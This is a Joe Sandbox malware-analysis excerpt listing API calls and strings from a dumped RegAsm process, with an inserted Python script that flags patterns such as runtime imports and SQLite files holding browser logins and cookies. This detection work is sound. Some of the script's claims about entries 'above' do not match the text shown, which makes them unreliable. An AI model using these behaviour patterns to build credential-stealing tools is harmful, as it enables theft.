                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memset
                                                                • String ID: gj
                                                                • API String ID: 438689982-4203073231
                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                • String ID: 0$6
                                                                • API String ID: 2029023288-3849865405
                                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                APIs
                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                • memset.MSVCRT ref: 00405455
                                                                • memset.MSVCRT ref: 0040546C
                                                                • memset.MSVCRT ref: 00405483
                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$memcpy$ErrorLast
                                                                • String ID: 6$\
                                                                • API String ID: 404372293-1284684873
                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AttributesErrorFileLastSleep$free
                                                                • String ID:
                                                                • API String ID: 1470729244-0
                                                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                APIs
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                • String ID:
                                                                • API String ID: 1331804452-0
                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                APIs
                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                • String ID: advapi32.dll
                                                                • API String ID: 2012295524-4050573280
                                                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
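The three function entries above (the memcpy sequence that appends "-journal" and "-wal" to a file name, the routine that copies GetSystemTime, GetCurrentProcessId, GetTickCount and QueryPerformanceCounter results into one buffer, and the routine that builds a path from GetSystemDirectoryW, calls LoadLibraryW and then resolves five exports with GetProcAddress) are easier to triage in bulk than by eye. The script below is an added example, not part of the Joe Sandbox report and not the sandbox's own code: it parses the "APIs" bullet format used in these entries (direct calls and "Part of subcall function" calls) into records and applies three heuristics to each entry. The heuristic names, the exact wording of the findings and the parsing regex are this example's own choices; the sample entries are copied verbatim from the three report entries named above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# One bullet of a Joe Sandbox "APIs" list, e.g.
#   • GetSystemTime.KERNEL32(?), ref: 00418836
#   • memcpy.MSVCRT ref: 00418845
#   • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]       # operands as the plugin printed them ("?" = unresolved)
    ref: int              # address of the call site
    subcall: int | None   # callee address when the API is reached through a subcall


def parse_apis(text: str) -> list[ApiCall]:
    """Parse the API bullets of one function entry; other lines are skipped."""
    calls: list[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m is None:
            continue
        args = [a for a in (m["args"] or "").split(",") if a]
        calls.append(ApiCall(
            name=m["name"], module=m["module"], args=args,
            ref=int(m["ref"], 16),
            subcall=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


# Heuristics keyed on API combinations that occur in the entries above.
SEED_SOURCES = {"GetSystemTime", "GetCurrentProcessId", "GetTickCount", "QueryPerformanceCounter"}
SQLITE_SIDE_FILES = {"-journal", "-wal"}  # SQLite rollback-journal / write-ahead-log suffixes


def triage(calls: list[ApiCall]) -> dict[str, str]:
    """Return {tag: explanation} for every heuristic the entry matches."""
    names = {c.name for c in calls}
    direct = [c for c in calls if c.subcall is None]   # the function's own calls, not its callees'
    findings: dict[str, str] = {}

    if SEED_SOURCES <= names and any(c.name == "memcpy" for c in direct):
        findings["seed-gathering"] = (
            "time, PID, tick count and QPC copied into one buffer: "
            "runtime material for a PRNG or key seed")

    gpa = sum(1 for c in direct if c.name == "GetProcAddress")
    if "LoadLibraryW" in names and gpa:
        where = " from the system directory" if "GetSystemDirectoryW" in names else ""
        findings["dynamic-import"] = (
            f"LoadLibraryW{where} followed by {gpa} GetProcAddress calls: "
            "imports resolved at run time rather than through the import table")

    if any(arg in SQLITE_SIDE_FILES for c in calls for arg in c.args):
        findings["sqlite-side-files"] = (
            "builds '<db>-journal' / '<db>-wal' names; Chrome and Firefox keep "
            "logins and cookies in SQLite databases")
    return findings


# Sample input: the three entries copied from the report above.
ENTROPY_ENTRY = """\
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
"""

LOADER_ENTRY = """\
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
"""

SQLITE_ENTRY = """\
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
• memset.MSVCRT ref: 0041BA3D
"""

if __name__ == "__main__":
    for label, entry in (("entropy", ENTROPY_ENTRY), ("loader", LOADER_ENTRY), ("sqlite", SQLITE_ENTRY)):
        calls = parse_apis(entry)
        print(f"{label}: {len(calls)} calls")
        for tag, why in triage(calls).items():
            print(f"  [{tag}] {why}")
```

Only direct calls count toward the GetProcAddress tally and the memcpy check, because "Part of subcall function" bullets describe callees and would otherwise be attributed to every caller that reaches them. To run this over a whole report, feed each block between one "APIs" label and the next "Memory Dump Source" line into parse_apis and keep the entry's Opcode ID alongside the findings.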
                                                                Strings
                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                • <%s>, xrefs: 004100A6
                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_snwprintf
                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                • API String ID: 3473751417-2880344631
                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscat$_snwprintfmemset
                                                                • String ID: %2.2X
                                                                • API String ID: 2521778956-791839006
                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintfwcscpy
                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                • API String ID: 999028693-502967061
                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                APIs
                                                                • memset.MSVCRT ref: 004116FF
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                • API String ID: 2618321458-3614832568
                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AttributesFilefreememset
                                                                • String ID:
                                                                • API String ID: 2507021081-0
                                                                • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                APIs
                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                • malloc.MSVCRT ref: 00417524
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                • free.MSVCRT ref: 00417544
                                                                • free.MSVCRT ref: 00417562
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                • String ID:
                                                                • API String ID: 4131324427-0
                                                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                APIs
                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                • free.MSVCRT ref: 0041822B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PathTemp$free
                                                                • String ID: %s\etilqs_$etilqs_
                                                                • API String ID: 924794160-1420421710
                                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastMessage_snwprintf
                                                                • String ID: Error$Error %d: %s
                                                                • API String ID: 313946961-1552265934
                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                • API String ID: 0-1953309616
                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                APIs
                                                                Strings
                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy
                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                • API String ID: 3510742995-272990098
                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                APIs
                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                • memset.MSVCRT ref: 0040C439
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                • memset.MSVCRT ref: 0040C4D0
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free$EnumValuememset$Open_wcsuprmemcpywcslen
                                                                • String ID:
                                                                • API String ID: 1423504147-0
                                                                • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                APIs
                                                                • memset.MSVCRT ref: 0044A6EB
                                                                • memset.MSVCRT ref: 0044A6FB
                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpymemset
                                                                • String ID: gj
                                                                • API String ID: 1297977491-4203073231
                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                APIs
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
